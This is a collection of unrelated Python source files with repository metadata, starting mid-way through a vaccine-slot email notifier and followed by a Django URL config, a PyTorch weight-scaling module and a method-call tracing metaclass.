intro = 'Vaccine for age <strong>{}+, Dose{}</strong> in <strong>{}</strong> available at {} pincode(s) as on {} {}'.format(age,dose,place_name,len(email_content),curr_time,curr_date)
msg = MIMEMultipart('alternative')
msg['Subject'] = "Vaccine {}+ Dose{}, {}".format(age,dose,place_name)
msg['From'] = ''#add email
table_contents = ''
sorted_keys = sorted(email_content)
for key in sorted_keys:
center_list = email_content[key]
if(len(center_list)>0):
for center in center_list:
col_name = '<td>'+str(center['name'])+'</td>'
col_pin = '<td>'+str(center['pin_code'])+'</td>'
col_slot = ''
for info in center['date_slots']:
col_slot += str(info)+'<br>'
col_slot = '<td>'+col_slot+'</td>'
col_cost = '<td>'+center['cost']+'</td>'
row = '<tr>{}{}{}{}</tr>'.format(col_name,col_pin,col_slot,col_cost)
table_contents += row
html = """ <html>
<head>{}</head>
<body>
<p>{}</p>
<table>
<tr><th>Name</th><th>Pin</th><th>Date(no. of slots)</th><th>Fee</th></tr>
{}
</table>
<p><a href={}>Register</a></p>
</body>
</html>
""".format(table_style,intro,table_contents,booking_website)
table_info = MIMEText(html, 'html')
server = smtplib.SMTP(smtpServer,port)
server.starttls(context=context)
server.ehlo()
msg.attach(table_info)
server.ehlo()
server.login(from_email, pswd)
server.sendmail(from_email,to_email,msg.as_string())
except Exception as e:
print("the email could not be sent.",e)
finally:
server.close()
def apply_filter(s_idx,c_idx):
group = subscribers[s_idx]
district_id = district_code[group['district']]
date = get_from_date(s_idx)
clinic_data = master_data[(district_id,date)][c_idx]
pin_check = False
hospital_check = False
if('restricted_pin' not in group or clinic_data['pincode'] in group['restricted_pin']):pin_check = True
if('restricted_hospital' not in group or clinic_data['center_id'] in group['restricted_hospital']):hospital_check =True
return pin_check and hospital_check
def get_slot_capacity(subscriber_idx,clinic_day_data):
group = subscribers[subscriber_idx]
dose_num = group['dose']
age = int(group['age'])
slot_capacity = int(clinic_day_data['available_capacity']) if clinic_day_data['min_age_limit'] == age else 0
if(slot_capacity > 0):
if(('available_capacity_dose1' or 'available_capacity_dose2') in clinic_day_data):
slot_capacity = int(clinic_day_data.get('available_capacity_dose'+str(dose_num),0))
return slot_capacity
def get_centers(subscriber_idx):
group = subscribers[subscriber_idx]
temp = {}
dist_payload['district_id'] = district_code[group['district']]
dist_payload['date'] = get_from_date(subscriber_idx)
master_data_key = (dist_payload['district_id'],dist_payload['date'])
if(master_data_key not in master_data):
result = requests.get(dist_url,params=dist_payload,headers=headers)
print('res:',result.status_code)
if(result.status_code==200):
master_data[master_data_key] = result.json()['centers']
else:
return temp
try:
clinics_data = master_data[master_data_key]
for clinic_idx,clinics in enumerate(clinics_data):
if(apply_filter(subscriber_idx,clinic_idx)):
clinic = {}
clinic['name']=clinics['name']
clinic['pin_code']=clinics['pincode']
clinic['date_slots']=[]
clinic['cost'] = str(clinics['fee_type'])
for sessions in clinics['sessions']:
num_slots = get_slot_capacity(subscriber_idx,sessions)
if(num_slots > 0):
clinic['date_slots'].append(sessions['date']+'('+str(num_slots)+')')
if(clinics['pincode'] not in temp):temp[clinics['pincode']] = []
if(len(clinic['date_slots'])>0):
if('vaccine_fees' in clinics):
for vaccine_type in clinics['vaccine_fees']:
clinic['cost']+="<br>"+str(vaccine_type['vaccine'])+'-'+str(vaccine_type['fee'])
temp[clinics['pincode']].append(clinic)
except Exception as e:
print("Error ",e)
finally:
return temp
for s_idx, group in enumerate(subscribers):
district_name = group['district']
dist_payload['district_id'] = district_code[district_name]
dist_res = []
curr_time = datetime.datetime.now().strftime('%H:%M:%S')
if('dose' in group and group['dose']>0 and group['dose']<3):
dist_res = get_centers(s_idx)
place_name = group['name'] if 'name' in group else district_name.capitalize()
print('Last status fetched for '+place_name+' for age '+str(group['age'])+', Dose'+str(group['dose'])+' at '+str(curr_time)+' '+str(curr_date)+', no. of centers:',len(dist_res))
if(len(dist_res)>0):send_email(dist_res,place_name,group['to_email'],group['age'],group['dose'])
else:print('Dose info not available/incorrect')
| 2.03125
| 2
|
daedalus_data_dictionary/storage/urls.py
|
aristotle-mdr/daedalus-data-dictionary
| 0
|
12782948
|
from django.conf.urls import url
from django.utils.translation import ugettext_lazy as _
from aristotle_mdr.contrib.generic.views import GenericAlterOneToManyView, generic_foreign_key_factory_view
from daedalus_data_dictionary.storage import models
urlpatterns = [
url(r'^dictionary/(?P<iid>\d+)?/edit/?$',
GenericAlterOneToManyView.as_view(
model_base=models.DataDictionary,
model_to_add=models.DataDictionaryInclusion,
model_base_field='datadictionaryinclusion_set',
model_to_add_field='dictionary',
#ordering_field='order',
form_add_another_text=_('Add a metadata concept'),
form_title=_('Change dictionary concept entries')
), name='data_dictionary_edit'),
]
| 1.804688
| 2
|
eeggan/pytorch/modules/weights/weight_scaling.py
|
kahartma/eeggan
| 3
|
12782949
|
# coding=utf-8
# Author: <NAME> <<EMAIL>>
import numpy as np
from torch import nn
from torch.nn import Parameter
from eeggan.pytorch.modules.conv.multiconv import MultiConv1d
class WeightScale(object):
"""
Implemented for PyTorch using WeightNorm implementation
https://pytorch.org/docs/stable/_modules/torch/nn/utils/weight_norm.html
References
----------
<NAME>., <NAME>., <NAME>., & <NAME>. (2017).
Progressive Growing of GANs for Improved Quality, Stability,
and Variation. Retrieved from http://arxiv.org/abs/1710.10196
"""
def __init__(self, name):
self.name = name
def compute_weight(self, module):
w = getattr(module, self.name + '_unscaled')
c = getattr(module, self.name + '_c')
tmp = c * w
return tmp
@staticmethod
def apply(module, name, gain):
fn = WeightScale(name)
weight = getattr(module, name)
# remove w from parameter list
del module._parameters[name]
# Constant from He et al. 2015
c = gain / np.sqrt(np.prod(list(weight.size())[1:]))
setattr(module, name + '_c', float(c))
module.register_parameter(name + '_unscaled', nn.Parameter(weight.data))
setattr(module, name, fn.compute_weight(module))
# recompute weight before every forward()
module.register_forward_pre_hook(fn)
return fn
def remove(self, module):
weight = self.compute_weight(module)
delattr(module, self.name)
del module._parameters[self.name + '_unscaled']
del module._parameters[self.name + '_c']
module.register_parameter(self.name, Parameter(weight.data))
def __call__(self, module, inputs, **kwargs):
setattr(module, self.name, self.compute_weight(module))
def weight_scale(module, gain=np.sqrt(2), name='weight'):
"""
Applies equalized learning rate to weights
Parameters
----------
module : module
Module scaling should be applied to (Conv/Linear)
gain : float
Gain of following activation layer
See torch.nn.init.calculate_gain
"""
if isinstance(module, MultiConv1d):
for i in range(len(module.convs)):
WeightScale.apply(module.convs[i], name, gain)
else:
WeightScale.apply(module, name, gain)
return module
def remove_weight_scale(module, name='weight'):
for k, hook in module._forward_pre_hooks.items():
if isinstance(hook, WeightScale) and hook.name == name:
hook.remove(module)
del module._forward_pre_hooks[k]
return module
raise ValueError("weight_scale of '{}' not found in {}"
.format(name, module))
| 2.59375
| 3
|
tracer/tracer.py
|
zachbateman/tracer
| 0
|
12782950
|
'''
Module containing Tracer metaclass and associated trace decorator.
'''
from types import FunctionType
from functools import wraps
import traceback
from pprint import pprint
import sys
class Tracer(type):
def __new__(cls, name, bases, cls_dct):
wrapped_cls_dct = {}
for attribute_name, attribute in cls_dct.items():
if attribute_name != '__init__':
wrapped_cls_dct[attribute_name] = trace(attribute) if isinstance(attribute, FunctionType) else attribute
else: # overwrite __init__ method to inject instance-level changes
def injected_init(self, *args, **kwargs):
self._trace = []
self.print_trace = lambda: pprint(self._trace, indent=4, depth=3)
cls_dct['__init__'](self, *args, **kwargs) # call existing __init__ after '_trace' attr is added
wrapped_cls_dct['__init__'] = injected_init
return super().__new__(cls, name, bases, wrapped_cls_dct)
def trace(method):
@wraps(method)
def wrapper(self, *args, **kwargs):
self._trace.append((len(self._trace) + 1, method.__name__, args, kwargs))
try:
return method(self, *args, **kwargs)
except:
traceback.print_exc()
print('\n\n ----- ERROR! Execution failed with above traceback. -----\nBelow is the Object\'s method call trace.')
print(self)
pprint(self._trace, indent=4, depth=3)
sys.exit()
return wrapper
| 2.609375
| 3
|